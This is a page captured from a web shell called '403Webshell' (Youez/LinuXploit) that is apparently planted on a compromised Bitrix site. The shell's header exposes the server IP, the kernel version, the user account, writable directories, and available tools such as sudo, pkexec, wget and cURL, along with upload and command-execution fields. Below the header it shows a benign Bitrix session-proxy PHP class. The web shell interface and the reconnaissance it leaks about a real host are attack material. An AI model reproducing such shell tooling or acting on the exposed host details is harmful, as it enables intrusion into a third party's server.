403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/main/lib/session/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/main/lib/session/kernelsessionproxy.php
<?php

namespace Bitrix\Main\Session;

final class KernelSessionProxy extends KernelSession
{
	/** @var Session */
	protected $session;

	public function __construct(Session $session)
	{
		$this->session = $session;
	}

	public function isActive(): bool
	{
		return $this->session->isActive();
	}

	public function isAccessible(): bool
	{
		return $this->session->isAccessible();
	}

	public function getId(): string
	{
		return $this->session->getId();
	}

	public function setId($id)
	{
		$this->session->setId($id);
	}

	public function getName(): string
	{
		return $this->session->getName();
	}

	public function setName($name)
	{
		$this->session->setName($name);
	}

	public function start(): bool
	{
		return $this->session->start();
	}

	public function regenerateId(): bool
	{
		return $this->session->regenerateId();
	}

	public function destroy()
	{
		$this->session->destroy();
	}

	public function save()
	{
		$this->session->save();
	}

	public function has($name)
	{
		return $this->session->has($name);
	}

	public function &get($name)
	{
		return $this->session->get($name);
	}

	public function set($name, $value)
	{
		$this->session->set($name, $value);
	}

	public function remove($name)
	{
		$this->session->remove($name);
	}

	public function delete($name)
	{
		$this->session->remove($name);
	}

	public function clear()
	{
		$this->session->clear();
	}

	public function isStarted()
	{
		return $this->session->isStarted();
	}

	public function offsetExists($offset): bool
	{
		return $this->session->offsetExists($offset);
	}

	public function offsetSet($offset, $value): void
	{
		$this->session->offsetSet($offset, $value);
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit